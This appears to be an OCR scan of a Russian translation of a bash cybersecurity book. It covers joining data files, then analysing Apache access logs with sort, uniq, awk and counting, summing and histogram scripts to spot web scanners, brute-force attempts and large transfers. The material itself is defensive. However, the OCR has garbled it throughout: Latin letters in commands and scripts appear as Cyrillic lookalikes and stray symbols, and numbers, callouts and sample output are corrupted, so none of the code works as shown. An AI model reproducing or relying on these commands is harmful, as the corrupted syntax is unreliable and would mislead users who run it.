Поскольку имена авторов представляют собой массив ]ЗОМ, при обращении к нему 
необходимо добавить []. Для доступа к определенному элементу массива исполь- 
зуйте индекс, начиная с позиции 0 ([9] для доступа к первому элементу массива). 
Для доступа ко всем элементам массива укажите [ ] без индекса. 


Для получения дополнительной информации о ја посетите сайт Һір://Ьі.1у/2НЈ252А. 


Агрегирование данных 


Данные часто собираются из различных источников, а также из различных фай- 
лов, сохраненных в разных форматах. Прежде чем вы сможете проанализировать 
данные, вы должны собрать их в определенном месте и в формате, позволяющем 
провести анализ. 


Предположим, вы хотите найти в хранилище файлов любой системы данные с име- 
нем Ргоаисёіопиерѕегуег. Напомним, что в предыдущих сценариях мы упаковы- 
вали собранные данные в теги ХМІ. в следующем формате: <‹ѕуѕёетіпҒоһоѕё="">. 
Во время сбора информации мы давали имена нашим файлам, используя имя хоста. 
Теперь вы можете указать любой из этих атрибутов, чтобы найти и объединить 
данные в одном месте: 


Ғіпа /дафа -+уре Ғ -ехес эгер '{}' -е 'Ргойисёіопмерѕегмег' \; 
-ехес са '{}' >> РгоаисёіопиерѕегмегАре. хі \; 


Команда +іпа /дажа -+уре + выводит список всех файлов в каталоге /дата и его под- 
каталогах. Для каждого найденного файла запускается команда вгер, чтобы найти 
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строку Ргоаисіопмерѕегуег. Если в файле такая строка найдена, он добавляется 
(>>) к файлу РгоаисііопиерѕегуегАре.іх+. Замените команду са* командой ср 
и укажите каталог, в который будут копироваться все файлы, вместо того чтобы 
добавляться в один файл. 


Можно также использовать команду јоіп, чтобы взять данные, расположенные 
в двух файлах, и объединить их в один. Рассмотрим два файла (примеры 6.10 и 6.11). 


Пример 6.10. ірѕ.їхї 


1р,05 
10.0.4.2,Міпӣомѕ 8 
10.0.4.35,0бип+и 16 
10.0.4.107 , тас0$ 
10.0.4.145 ‚тас0$ 


Пример 6.11. изег ХЕ 


и5ег,1р 
јаое,10.0.4.2 
јѕтіћ,10.0.4.35 
тѕті+һ,10.0.4.107 
їјопеѕ,10.0.4.145 


В файлах повторяется общий столбец данных, который представляет собой ІР- 
адреса, и их можно объединить с помощью команды јоіп: 


$ јоіп -Е, -2 2 ірѕ.їхі иѕег.1хі 


1р,05,иѕег 
10.0.4.2,Міпӣомѕ 8, јаое 
10.0.4.35,0бипёи 16, ] эт ЕП 
10.0.4.107, тас0$ , мэт1 ЕВ 
10.0.4.145, тас0$ , {]опе$ 


Опция -+, указывает на то, что столбцы разделяются запятой; по умолчанию раз- 
делителем будет пробел. 


Опция -2 2 указывает команде јоіп использовать для выполнения слияния второй 
столбец данных во втором файле (иѕег.іх+). По умолчанию в качестве ключа јоіп 
использует первое поле, которое соответствует первому файлу (ірѕ.іх+). При не- 
обходимости объединения по другому полю в ірѕ.іхї следует добавить опцию -1 п, 
где п заменяется соответствующим номером столбца. 


Чтобы можно было воспользоваться командой јоіп, оба файла должны быть отсор- 
тированы по столбцу, который будет использоваться для выполнения слияния. 
Для этого можно применить команду сортировки, которая рассматривается в главе 7. 
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Выводы 


В этой главе рассматриваются способы обработки универсальных форматов дан- 
ных, в числе которых С$У, ]ЗОМ и ХМІ. Подавляющее большинство данных, ко- 
торые вы собираете и обрабатываете, будут находиться в одном из этих форматов. 


В следующей главе мы поговорим о том, как эти данные можно проанализировать 
и преобразовать в информацию, которая позволит получить представление о со- 
стоянии системы, чтобы управлять процессом принятия решений. 


Упражнения 


1. В отношении следующего файла +азК$.+хЕ используйте команду сиё, чтобы 
извлечь столбцы 1 (Ітаве Мате), 2 (РТО) и 5 (Мет Цзаре): 


Ітаре Мате;РТО;5е$$1оп Мате; Ѕеѕ5іоп#; Мет Оѕаве 
Ѕуѕёет Іа1е Ргосеѕ5;0;5егуісеѕ;0;4 К 
Ѕуѕіет; 4; Ѕегуісеѕ;0;2,140 К 
5м55.ехе; 340; Ѕ5егуісеѕ;0;1,060 К 
сѕг55.ехе;528;5егуісеѕ;0;4,756 К 
2. Для файла ргосомпег.х выполните команду јоіп, чтобы объединить его с фай- 


лом Фа$К$ .хі из предыдущего упражнения: 


Ргосез$5 Омпег;РТО 
]4ое;@ 
їјопеѕ;4 
јѕтіЁһ ; 340 
тѕтіЁһ ; 528 
3. Используя команду +", замените все символы с запятой в файле Фаѕкѕ.Ёхі сим- 


волом табуляции и выведите файл на экране. 
4. Напишите команду, которая извлекает имена и фамилии всех авторов из файла 


Боск. јѕоп. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт һірѕ://Лум.гарійсубегорѕ.соту/. 


Анализ данных 


В предыдущих главах, чтобы собрать и подготовить данные к анализу, мы ис- 
пользовали сценарии. Теперь нам нужно разобраться во всех полученных данных. 
Проанализировать большие объемы данных часто помогает поиск, который по мере 
поступления новых данных следует постоянно уточнять и ограничивать. 


В этой главе в качестве входных данных для наших сценариев мы возьмем инфор- 
мацию из журналов веб-сервера. Все данные используются для демонстрационных 
целей. Сценарии и методы можно легко изменить для работы с данными практи- 
чески любого типа. 


Используемые команды 


Для сортировки и ограничения отображаемых данных воспользуемся командами 
ѕогі, һеаа и ип1а. Работу с ними продемонстрируем на файле из примера 7.1. 


Пример 7.1. Не1.54 


12/05/2017 192.168.10.14 +еѕ+.һЕт1 
12/30/2017 192.168.10.185 1оріп.һїіт1 


ЅОГЇ 


Команда ѕог+ используется для сортировки текстового файла в числовом и алфа- 
витном порядке. По умолчанию строки будут упорядочены по возрастанию: сна- 
чала цифры, затем буквы. Буквы верхнего регистра, если не указано иначе, будут 
идти раньше соответствующих букв нижнего регистра. 


Общие параметры команды 


С -г — сортировать по убыванию. 


О -Е— игнорировать регистр. 
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О -п — использовать числовой порядок: 1, 2, Зи до 10 (по умолчанию при сорти- 
ровке в алфавитном порядке 2 и 3 идут после 10). 


С -К— сортировать на основе подмножества данных (ключа) в строке. Поля раз- 
деляются пробелами. 


О -о — записать вывод в указанный файл. 
Пример команды 


Для сортировки файла #11е1.+х+ по столбцу, в котором указано имя файла, и игно- 
рирования столбца с ТР-адресом необходимо использовать следующую команду: 


ѕогі -К 3 +11е1.+хЕ 


Можно также выполнить сортировку по подмножеству поля. Для сортировки по 
второму октету ІР-адреса напишите следующее: 


50ГЕ -К 2.5,2.7 +11е1. хе 


Будет выполнена сортировка первого поля с использованием символов от 5 до 7. 


ипі 


Команда ип1а позволяет отфильтровать повторяющиеся строки с данными, кото- 
рые встречаются друг рядом с другом. Чтобы удалить в файле все повторяющиеся 
строки, перед использованием команды ип1а файл нужно отсортировать. 


Общие параметры команды 


О -с — вывести, сколько раз повторяется строка. 


О -+ — перед сравнением проигнорировать указанное количество полей. Напри- 
мер, параметр -+ 3 позволяет не принимать во внимание в каждой строке первые 
три поля. Поля разделяются пробелами. 


О -1 — игнорировать регистр букв. В ип1а регистр символов по умолчанию учи- 
тывается. 


Ознакомление с журналом доступа к веб-серверу 


Для большинства примеров в этой главе мы используем журнал доступа к веб- 
серверу Арасћһе. В журнал этого типа записываются запросы страницы, сделан- 
ные к веб-серверу, время, когда они были сделаны, и имя того, кто их сделал. 
Образец типичного файла комбинированного формата журнала (СотЬіпеа Тое 
Еогтаї) Арасһе можно увидеть в примере 7.2. Полный лог-файл, который был 
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использован в этой книге, называется ассеѕѕ.1ор. Его можно загрузить по адресу 
Һрѕ: //млуму.гаріасубегорѕ.соту/. 


Пример 7.2. Фрагмент файла ассеѕѕ.І09 


192.168.0.11 - - [12/№\/2017:15:54:39 -0500] "СЕТ /гедиеѕ+-дио+е.һёт1 НТТР/1.1" 
200 7326 "ИЕр://192.168.0.35/зирроге.Ит1" "Мо7111а/5.0 (Міпаомѕ МТ 6.3; №1п64; 
х64; гу:56.0) беско/20100101 ҒігеҒох/56.0" 


Журналы веб-сервера используются просто в качестве примера. Методы, опи- 
санные в этой главе, можно применять для анализа различных типов данных. 


Поля журнала веб-сервера Арасћһе описаны в табл. 7.1. 


Таблица 7.1. Поля журнала веб-сервера Арасһће 


Поле Описание Номер 
поля 

192.168.0.11 1Р-адрес хоста, запросившего страницу 1 

— Идентификатор протокола КЕС 1413 (-, если 2 


идентификатора нет) 


— Идентификатор пользователя с проверкой З 
подлинности НТТР (-, если идентификатора нет) 


[12/№у%/2017:15:54:39 -0500] Смещение даты, времени и СМТ (часовой пояс) |4, 5 


СЕТ /тедиеѕі-диосе.Һет] Страница, которая была запрошена 6,7 
НТТР/1.1 Версия протокола НТТР 8 
200 Код состояния, возвращаемый веб-сервером 9 
7326 Размер возвращаемого файла в байтах 10 
ћсер://192.168.0.35 /ѕирроге. Һет | Ссылающаяся страница 11 
Мо7Ша/5.0 (У шао\уз МТ 6.3; Агент пользователя, идентифицирующий браузер |12+ 
Мп б4... 


Существует второй тип журнала доступа Араспе, известный как обычный фор- 
мат журнала (Соттоп од Еогтаї). Формат совпадает с комбинированным, 
за исключением того, что не содержит полей для ссылающейся страницы или 
агента пользователя. Дополнительную информацию о формате и конфигурации 
журналов Арасһе можно получить на сайте проекта Арасһће НТТР Ѕегуег: НЕр:// 
Ы.1у/2СЈимѕ5. 
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Коды состояния, указанные в табл. 7.1 (поле 9), позволяют узнать, как веб-сервер 
ответил на любой запрос. Популярные коды приведены в табл. 7.2. 


Таблица 7.2. Код состояния НТТР 


Код | Описание 
200 |ОК (Хорошо) 


401 | Опаифогие4 (Не авторизован (не представился)) 


404 | Раве № Еоџпа (Страница не найдена) 


500 | Пхцегпа[ Ѕегуег Еггог (Внутренняя ошибка сервера) 


502 | Ваа Саѓеуау (Плохой, ошибочный шлюз) 


Полный список кодов можно найти в реестре кодов состояния протокола пере- 
дачи гипертекста (НТТР) (Һр://ЫіЄ1у/212пјХВ). 


Сортировка и упорядочение данных 


При первичном анализе данных в большинстве случаев полезно начинать с рас- 
смотрения экстремальных значений: какие события происходили наиболее или 
наименее часто, самый маленький или самый большой объем переданных данных 
ит. д. Например, рассмотрим данные, которые можно собрать из файлов журнала 
веб-сервера. Необычно большое количество обращений к страницам может ука- 
зывать на активное сканирование или попытку отказа в обслуживании. Необычно 
большое количество байтов, загруженных хостом, может указывать на то, что дан- 
ный сайт клонируется или происходит эксфильтрация данных. 


Чтобы управлять расположением и отображением данных, укажите в конце коман- 
ды ѕог+, һеаа и *а11: 


.| $з0г% -К 2.1 -гп | Неа -15 


При этом выходные данные сценария передаются команде ѕог+, а затем отсор- 
тированный вывод направляется команде һеаа, которая напечатает 15 верхних 
(в данном случае) строк. Команда ѕог+ в качестве своего ключа сортировки (-К) ис- 
пользует второе поле, начиная с его первого символа (2.1). Более того, эта команда 
выполнит обратную сортировку (-г), а значения будут отсортированы в числовом 
порядке (-п). Почему числовой порядок? Потому что 2 отображается между 1 и 3, 
а не между 19 и 20 (как при сортировке в алфавитном порядке). 
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Используя команду һеаа, мы захватываем первые строки вывода. Мы могли бы 
получить последние несколько строк, передавая вывод из команды ѕогі команде 
{а11 вместо һеаа. Использование команды *а11 с опцией -15 выведет последние 
15 строк. Другой способ отсортировать данные по возрастанию, а не по убыванию — 
удалить параметр -г. 


Подсчет количества обращений к данным 


Типичный журнал веб-сервера может содержать десятки тысяч записей. Подсчиты- 
вая, сколько раз страница была доступна, и узнавая, по какому ІР-адресу она была 
доступна, вы можете получить лучшее представление об общей активности сайта. 
Далее приводятся записи, на которые следует обратить внимание. 


О Большое количество запросов, возвращающих код состояния 404 («Страница 
не найдена») для конкретной страницы. Это может указывать на неработающие 
гиперссылки. 


О Множество запросов с одного ІР-адреса, возвращающих код состояния 404. 
Это может означать, что выполняется зондирование в поисках скрытых или 
несвязанных страниц. 


о Большое количество запросов, в частности, с одного и того же ТР-адреса, воз- 
вращающих код состояния 401 («Не авторизирован»). Это может свидетель- 
ствовать о попытке обхода аутентификации, например о переборе паролей. 


Чтобы обнаружить такой тип активности, нам нужно иметь возможность извлекать 
ключевые поля, например исходный ІР-адрес, и подсчитывать, сколько раз они по- 
являются в файле. Поэтому для извлечения поля мы воспользуемся командой сиё, 
а затем передадим вывод в наш новый инструмент, файл соипёет. И, показанный 
в примере 7.3. 


Пример 7.3. соипіет.ѕћ 


#1/бріп/баѕћ - 

# 

Вай и кибербезопасность 
соиптет. ѕћ 


Описание: 
Подсчет количества экземпляров элемента с помощью баѕћ 


Использование: 
соипфет.$И < іприё+ғі1е 


жнжжнжнжжн нн 


ес1аге -А спі # ассоциативный массив о 
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мһі1е геад іа хега [2] 
ао 

Іеі спі[%1а]++ © 
опе 


# вывести то, что мы подсчитали 
# для каждого ключа в ассоциативном массиве в виде (ключ, значение) 


Ғог іа іп "${!сп[@]}" ө 
ао 

реа '%а %5\п' "%{спЕ[$1а7]}" "%іа" о 
аопе 


© Поскольку мы не знаем, с какими ІР-адресами (или другими строками) можем 
столкнуться, будем использовать ассоциативный массив (также известный как 
хеш-таблица или словарь). В этом примере массив задан с параметром -А, который 
позволит нам использовать любую строку в качестве нашего индекса. 


Функция ассоциативного массива предусмотрена в Баѕћ версии 4.0 и выше. 
В таком массиве индекс не обязательно должен быть числом и может быть пред- 
ставлен в виде любой строки. Таким образом, вы можете индексировать массив по 
ТР-адресу и подсчитывать количество обращений этого ІР-адреса. В случае если 
вы используете версию программы старше, чем Баѕћ 4.0, альтернативой этому сце- 
нарию будет сценарий, показанный в примере 7.4. Здесь вместо ассоциативного 
массива используется команда амк. 


В Баѕћ для ссылок на массив, как и для ссылок на элемент массива, используется 
синтаксис ${уаг[іпдех]}. Чтобы получить все возможные значения индекса 
(ключи, если эти массивы рассматриваются как пара («ключ/значение»)), укажите 


${ !сп[@]}. 


Ө Хотя мы ожидаем в строке только одно слово ввода, добавим переменную х+га, 
чтобы захватить любые другие слова, которые появятся в строке. Каждой пере- 
менной в команде геад присваивается соответствующее слово из входных данных 
(то есть первая переменная получает первое слово, вторая переменная — второе 
слово ит. д.). При этом последняя переменная получает все оставшиеся слова. 
С другой стороны, если в строке входных слов меньше, чем переменных в команде 
геаа, этим дополнительным переменным присваивается пустая строка. Поэтому 
в нашем примере, если в строке ввода есть дополнительные слова, они все будут 
присвоены переменной хЕга. Если же нет дополнительных слов, переменной х&га 
будет присвоено значение пи11. 


© Строка используется в качестве индекса и увеличивает его предыдущее значение. 
При первом использовании индекса предыдущее значение не будет установлено 
и он будет равен ө. 


Ө Данный синтаксис позволяет нам перебирать все различные значения индекса. 
Обратите внимание: нельзя гарантировать, что при сортировке мы получим 
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алфавитный или какой-то другой конкретный порядок. Это объясняется природой 
алгоритма хеширования значений индекса. 


© При выводе значения и ключа мы помещаем значения в кавычки, чтобы всегда 
получать одно значение для каждого аргумента, даже если оно содержит один или 
два пробела. Мы не думаем, что такое произойдет при работе этого сценария, но 
подобная практика кодирования делает сценарии более надежными при исполь- 
зовании в различных ситуациях. 


В примере 7.4 показана другая версия сценария, с использованием команды амк. 


Пример 7.4. соип{ет.амК 
Вай и кибербезопасность 
соипёет. амк 


Описание: 
Подсчет количества экземпляров элемента с помощью команды амк 


Использование: 
соиптет. амк < іпри++і1е 


{Еж 


амк '{ спе[$1]++ } 
ЕМО { Фог (14 іп сп) { 
рг1пЕ+ "%а %$\п", сп[1іа], іа 
} 
у’ 
Оба сценария будут хорошо работать в конвейере команд: 


си -а' ' -#1 1овҒі1е | БазН соипёет. ѕһ 


Команда си* на самом деле здесь не нужна ни для одной из версий. Почему? 
Потому что сценарий амк явно ссылается на первое поле ($1), а то, что команда 
си в сценарии оболочки не нужна, объясняется кодировкой команды геаа (см. Ө). 
Так что мы можем запустить сценарий следующим образом: 


БазИ соипфет.$И < ІорҒі1е 


Например, чтобы подсчитать, сколько раз ТР-адрес делал НТТР-запрос, на который 
возвращалось сообщение об ошибке 404 («Страница не найдена»), нужно ввести 
такую команду: 


$ амк '$9 == 404 {ргіпі $1}' ассеѕ5.10о6 | Ббаѕһ соипет. И 
1 192.168.0.36 


2 192.168.0.37 
1 192.168.0.11 
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Вы также можете использовать команду вгер 404 ассеѕ5.106 и передать данные 
сценарию соџпёет. $Н. Но в этом случае будут включены строки, в которых сочетание 
цифр 404 будет найдено и в других местах (например, число байтов или часть пути 
к файлу). Команда амк указывает подсчитывать только те строки, в которых возвра- 
щаемый статус (поле 9) равен 404. Далее будет выведен только ІР-адрес (поле 1), 
а вывод направится в сценарий соипфет. $1, с помощью которого мы получим общее 
количество запросов, сделанных ТР-адресом и вызвавших ошибку 404. 


Сначала проанализируем образец файла ассез$ .1ор. Начать анализ следует с про- 
смотра узлов, которые обращались к веб-серверу. Вы можете использовать команду 
си операционной системы Глпих, с помощью которой будет извлечено первое поле 
файла журнала, где содержится исходный ІР-адрес. Затем следует передать выход- 
ные данные сценарию соџпёет. ѕћ. Правильная команда и ее вывод показаны здесь: 


$ си -а' ' -#1 ассеѕ5.106 | БазН соипфет.$И | зогф -гп 


111 192.168.0.37 
55 192.168.0.36 
51 192.168.0.11 
42 192.168.0.14 
28 192.168.0.26 


Если у вас нет доступного сценария соипїет.ѕћ, для достижения аналогичных 
результатов можно использовать команду ип с параметром -с. Но для корректной 
работы предварительно потребуется дополнительно отсортировать данные. 


$ сиб -4' ' -Ғ1 ассеѕ5.106 | ѕогі | ип1а -с | ѕог -гп 


111 192.168.0.37 
55 192.168.0.36 
51 192.168.0.11 
42 192.168.0.14 
28 192.168.0.26 


Вы можете продолжить анализ, обратив внимание на хост с наибольшим количе- 
ством запросов. Как видно из предыдущего кода, таким хостом является ІР-адрес 
192.168.0.37, номер которого — 111. Можно использовать амк для фильтрации по 
ТР-адресу, чтобы затем извлечь поле, содержащее запрос, передать его команде сиё 
и, наконец, передать вывод сценарию соип*ет. $1, который и выдаст общее количе- 
ство запросов для каждой страницы: 


$ амк '$1 == "192.168.0.37" {ргіп $0}' ассез$.1ор | си -а' ' -#7 
| Баѕһ соипёет. $ 


1 /ир10а15/2/9/1/4/29147191/31549414299.рпв?457 
14 /+і1еѕ/һете/тобі1е49с2.ј5?1490908488 
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1 /сап2.еаіїтуѕіёе. сот/ітареѕ /едітог/һете-баскегоипа/ѕъоск/іРаа. ті 
1 /ир10ай5/2/9/1/4/29147191/2992005 огіє.јре 


14 /#11е5ѕ/©һете/сиѕ&от49с2.ј5?1490908488 


Активность этого конкретного хоста не впечатляет и напоминает стандартное по- 
ведение браузера. Если вы посмотрите на хост со следующим наибольшим коли- 
чеством запросов, то увидите нечто более интересное: 


$ амк '$1 == "192.168.0.36" {ргіпї $0}' ассез$.1ор | си -4' ' -#7 
| Базй соип+ет. $Н 


/+11е5/{Пете/тоб11е49с2.]$?1490908488 
/чр1о0аа$/2/9/1/4/29147191/31549414299.рпё?457 
/_/сап2.е914ту$1{е.сом/.../Со+Рее .Нт1 
/_/сап2.едієтуѕіе. сот/.. . /1Раа. һт1 


/ир1оаӣѕ5/2/9/1/4/29147191/601239 огіє.рпе 


№. 


Этот вывод указывает, что хост 192.168.0.36 получил доступ чуть ли не к каждой 
странице сайта только один раз. Данный тип активности часто указывает на ак- 
тивность веб-сканера или клонирование сайта. Если вы посмотрите на строку 
пользовательского агента, то увидите дополнительное подтверждение этого пред- 
положения: 


$ амк '$1 == "192.168.0.36" {ргіпї $0}' ассез$.1ор | си -4' ' -#12-17 | ип1а 
"Мо2111а/4.5 (сотра{161е; НТТгаск 3.0х; М1пдом$ 98) 


Агент пользователя идентифицирует себя как НТТгаск. Это инструмент, который 
можно использовать для загрузки или клонирования сайтов. Хотя этот инструмент 
не обязательно приносит вред, во время анализа стоит обратить на него внимание. 


Дополнительную информацию о НТТаск вы можете найти на сайте ћёїр:// 
умму. Һгаск.соту/. 


Суммирование чисел в данных 


Что делать, если вместо того, чтобы подсчитывать, сколько раз ІР-адрес или другие 
элементы обращались к определенным ресурсам, вы хотите узнать общее количе- 
ство байтов, отправленных по ІР-адресу, или то, какие ТР-адреса запросили и полу- 
чили больше всего данных? 


Решение мало чем отличается от сценария соипёет. ѕћ. Внесите в этот сценарий 
несколько небольших изменений. Во-первых, вам нужно так настроить входной 
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фильтр (команда сиё), чтобы из большого количества столбцов извлекались два 
столбца: ТР-адрес и счетчик байтов, а не только столбец с ТР-адресом. Во-вторых, 
следует изменить вычисление с приращением (1еї сп[$14]++) на простой счет, 
чтобы суммировать данные из второго поля (1е сп[%$14]+= $даха). 


Теперь конвейер будет извлекать два поля из файла журнала — первое и последнее: 


Сие -4' ' -+ 1,10 ассез$.1ов | БазН зиттег. И 


Сценарий ѕиттег. В, показанный в примере 7.5, читает данные из двух столбцов. 
Первый столбец состоит из значений индекса (в данном случае ТР-адресов), а вто- 
рой столбец — это число (в данном случае количество байтов, отправленных по 
ТР-адресу). Каждый раз, когда сценарий находит в первом столбце повторяющийся 
ТР-адрес, он добавляет значение из второго столбца к общему количеству байтов 
для этого адреса, суммируя таким образом количество байтов, отправленных этим 
ТР-адресом. 


Пример 7.5. ѕиттег.5ћ 


#1! /61п/Ба$й - 

# 

ВазИ и кибербезопасность 
зиттег . И 


Описание: 
Суммировать итоговые значения поля 2 для каждого уникального поля 1 


Использование: ./зиттег. И 
формат ввода: ‹пате> <питбег> 


Е +Е+-—+-+- 


ес1аге -А спі # ассоциативный массив 
мһі1е геаа іа соипі 
ао 
Іеї сп+[$14]+=%соип+ 
аопе 
Ғог іа іп "%{! спе[@]}" 
ао 
ргіпЕҒ "%-155 %84\п" "%{1а}" "%{спе[${14}]}" © 
аопе 


© Обратите внимание, что в формат вывода мы внесли несколько изменений. 
К размеру поля мы добавили 15 символов для первой строки (в нашем примере это 
данные ІР-адреса), установили выравнивание по левому краю (с помощью знака 
минус) и указали восемь цифр для значений суммы. Если сумма окажется больше, 
то будет выведено большее число, если же строка окажется длиннее, то она будет 
напечатана полностью. Это сделано для того, чтобы выровнять данные по соот- 
ветствующим столбцам: так столбцы будут аккуратными и более читабельными. 
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Для получения представления об общем объеме данных, запрашиваемых каждым 
хостом, можно в сценарии ѕиттег. $ запустить файл ассез$ .1о8. Для этого исполь- 
зуйте команду сит, которая извлечет ТР-адрес и переданные байты полей, а затем 
передайте вывод в сценарий зиттег. $И: 


$ сиф -4' ' -#1,10 ассез$.1ор | баѕһ зитшег.$Н | зоге -К 2.1 -гп 


192.168.0.36 4371198 
192.168.0.37 2575030 
192.168.0.11 2537662 
192.168.0.14 2876088 
192.168.0.26 665693 


Эти результаты могут быть полезны для выявления хостов, которые передали 
необычно большие объемы данных по сравнению с другими хостами. Всплеск 
может указывать на кражу данных и эксфильтрацию. Когда такой хост будет 
определен, нужно просмотреть конкретные страницы и файлы, к которым он 
обращался, чтобы попытаться классифицировать его как вредоносный или без- 
опасный. 


Отображение данных в виде гистограммы 


Можно выполнить еще одно действие, обеспечив более наглядное отображе- 
ние полученных результатов. Вы можете взять вывод сценария соипёет. ѕћ или 
зиттег . И и передать его в другой сценарий, который будет создавать гистограм- 
му, отображающую результаты. 


Сценарий, выполняющий печать, будет принимать первое поле в качестве индекса 
ассоциативного массива, а второе поле — в качестве значения для этого элемента 
массива. Затем следует пересмотреть весь массив и распечатать несколько хеште- 
гов для представления самого большого числа в списке (пример 7.6). 


Пример 7.6. һіѕіодгат.ѕћ 
#1/бріп/баѕћ - 

# 

Ваѕһ и кибербезопасность 
[15$ оргам. $И 


Описание: 
Создание горизонтальной гистограммы с указанными данными 


Использование: ./П15фобгам. $И 
формат ввода: 1абе1 уа1ие 


не 


Ғипсёіоп рг_Баг () © 


Глава 7. Анализ данных 121 


{ 
1оса1 -1 і гам тахгам ѕса1еа ө 
гам=$1 
тахгам=$2 
((ѕса1еӣ= (МАХВАК*гам) /тахгам)) © 
# гарантированный минимальный размер 
((гам > @ && ‹са1еа == 0)) && ѕса1ей=1 ө 
Ғог((1=0; і<ѕса1еа; і++)) ; ао ргіпЕҒ '#' ; опе 
ргіпЕе '\п' 

} # ре Баг 

# 

# "маіп" 

# 

ес1аге -А КА 

дес1аге -1 МАХВАВ тах ө 

тах=0@ 


МАХВАВ=50 # размер самой длинной строки 


мһі1е геаа 1аБ1 \уа1 

ао 
Іеї КА[%1аЫЬ1 ]=%уа1 ө 
# сохранить наибольшее значение; для масштабирования 
(( ма1 > тах )) && тах=$уа1 

аопе 


# масштабировать и вывести 


Жог 1а61 іп "${!КА[@]}" [7] 
о 

рг1пЕ+ '%-20.205 ' "$1аб1" 

рг_Баг ${КА[$1аб1]} $тах ө 
аопе 


© Мы определяем функцию, с помощью которой нарисуем один столбец гисто- 
граммы. Определение должно находиться перед самой функцией, поэтому имеет 
смысл поместить все определения функций в начале нашего сценария. Данная 
функция в будущем сценарии будет использована повторно, поэтому ее можно 
поместить в отдельный файл и подключать с помощью команды ѕоигсе. Но мы 
сделали по-другому. 


Ө Мы объявляем все эти переменные локальными, так как не хотим, чтобы они ме- 
шали определению имен переменных в остальной части данного сценария (или лю- 
бых других, если мы копируем/вставляем этот сценарий для использования в другом 
месте). Мы объявляем все эти переменные целыми числами (это параметр -1), по- 
тому что будем вычислять только целые значения и не станем использовать строки. 


© Вычисление выполняется в двойных скобках. Внутри них не нужно использо- 
вать символ $ для указания значения каждого имени переменной. 
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© Это оператор і#-1еѕѕ. Если выражение внутри двойных скобок равно +гие, то 
тогда и только тогда выполняется второе выражение. Такая конструкция гаранти- 
рует, что если исходное значение не равно нулю, то масштабированное значение 
никогда не будет равно нулю. 


Ө Основная часть сценария начинается с объявления ВА как ассоциативного массива. 


© Здесь мы ссылаемся на ассоциативный массив, используя метку строки в каче- 
стве его индекса. 


© Поскольку массив не индексируется по числам, мы не можем просто считать 
целые числа и использовать их в качестве индексов. Эта конструкция определяет 
все различные строки, которые использовались в качестве индекса массива, по 
одному индексу в цикле +ог. 


Ө Мы еще раз используем метку как индекс, чтобы получить счетчик и передать 
его как первый параметр нашей функции рг Бағ. 


Обратите внимание, что элементы отображаются не в том порядке, что и входные 
данные. Это связано с тем, что алгоритм хеширования для ключа (индекса) не со- 
храняет порядок. Вы можете упорядочить этот вывод или использовать другой 
ПОДХОД. 


Пример 7.7 представляет собой версию сценария для построения гистограммы — 
в нем сохраняется последовательность вывода и не используется ассоциативный 
массив. Это также может быть полезно для старых версий Баѕћ (до 4.0), в которых 
ассоциативный массив еще не использовался. Здесь показана только основная 
часть сценария, так как функция рг_ Баг остается прежней. 


Пример 7.7. һіѕіодгат_ріаіп.ѕћ 


#1/ріп/баѕћ - 

# 

Ваѕһ и кибербезопасность 
һіѕёоргат р1аіп.ѕһћ 


Описание: 
Создание горизонтальной гистограммы с указанными данными без использования 
ассоциативных массивов, хорошо подходит для старых версий баѕћ 


Использование: . /һіѕ&овгат р1аіп. ѕһ 
формат ввода: 1абе1 уа1ие 


{че + 


Чес1аге -а КА Кеу ВА уа1 Ф 
ес1аге -і тах пах 
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мах=@9 
тахбаг=56 # размер самой длинной строки 


пах=0 

мһі1е геаа 1аБ1 \уа1 

о 
ВА_Кеу[$пах]=$1а61 ө 
КА_уа1ие [$пах] =$уа1 
# сохранить наибольшее значение; для масштабирования 
(( ма1 > мах )) && тах=$уа1 
Іеї пах++ 

опе 


# масштабировать и вывести 
Ғог ((3=0; ј<пах; ј++)) [3] 
до 
ргіпЕҒ "%-20.205 " ${КА Кеу[%51} 
рг_Баг ${ВА_уа1ие[$3]} Фтах 
опе 


Эта версия сценария позволяет избежать использования ассоциативных массивов 
(например, в более старых версиях Баѕһ или в системах тасО5). Здесь мы применя- 
ем два отдельных массива; один для индексного значения и один — для счетчиков. 
Поскольку это обычные массивы, мы должны использовать целочисленный индекс 
и будем вести простой подсчет в переменной пах. 


© Здесь имена переменных объявляются как массивы. Строчная а указывает, что 
они являются массивами, но это не ассоциативные массивы. Это не обязательное 
требование, зато рекомендуемая практика. Аналогично в следующей строке мы за- 
даем параметр -1 для объявления этих переменных целыми числами, что делает их 
более эффективными, чем необъявленные переменные оболочки (которые хранятся 
в виде строк). Повторимся: как видно из того, что мы не объявляем тахбаг, а просто 
используем его, это необязательное требование. 


Ө Пары «ключ/значение» хранятся в отдельных массивах, но в одном и том же 
месте индекса. Это ненадежный подход — изменения в сценарии в какой-то момент 
могут привести к тому, что два массива не синхронизируются. 


Ө Цикл #ог, в отличие от предыдущего сценария, используется для простого под- 
счета целых чисел от @ до пах. Здесь переменная 3 выступает препятствием для 
индекса в цикле #ог внутри сценария рг_Баг, несмотря на то что внутри функции 
мы достаточно аккуратно объявляем эту версию 1 как локальную функцию. Вы до- 
веряете этой функции? Измените здесь ј на і и проверьте, работает ли цикл (а он 
работает). Затем попробуйте удалить локальное объявление и проверить, успеш- 
но ли завершится цикл. 
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Такой подход с двумя массивами имеет одно преимущество. Используя числовой 
индекс для хранения метки и данных, можно получить их в том порядке, в котором 
они были прочитаны — в числовом порядке индекса. 


Теперь, извлекая соответствующие поля из ассеѕѕ.1ор и перенося результаты 
в зиттег . $Н, а затем — в 11$ о5гам. ѕһ, можно наглядно увидеть, какие хосты пере- 
дали наибольшее количество байтов: 


$ сиб -4' ' -#1,10 ассез$.1ор | баѕһ зиттег.$Н | Базй һіѕёовгат. ѕһ 
192.168.0.36 ЗЕНА АЕН ЕО НЕНА ЕН НЕ НН НЕННЕ 
192.168.0.37 ЕНН НАННЕ Н НЕННЕ 

192.168.0.11 ЕНН ННН НЕННЕ 

192.168.0.14 НИНА ННН НЕН ННН ННН 

192.168.0.26 ННЕНННЕ 


Хотя данный подход может показаться не столь эффективным для небольшого объ- 
ема выборочных данных, возможность визуализации имеет неоценимое значение 
при рассмотрении более крупных наборов данных. 


Помимо количества байтов, передаваемых через ІР-адрес или хост, часто ин- 
тересно просмотреть данные, отсортированные по дате и времени. Для этого 
можно использовать сценарий зиттег. ѕћ, но из-за формата файла ассез$ .1ов, 
прежде чем передать его в сценарий, его нужно дополнительно обработать. Если 
для извлечения переданных полей с датой/временем и байтов используется 
команда сиё, остаются данные, которые могут вызвать некоторые проблемы 
для сценария: 


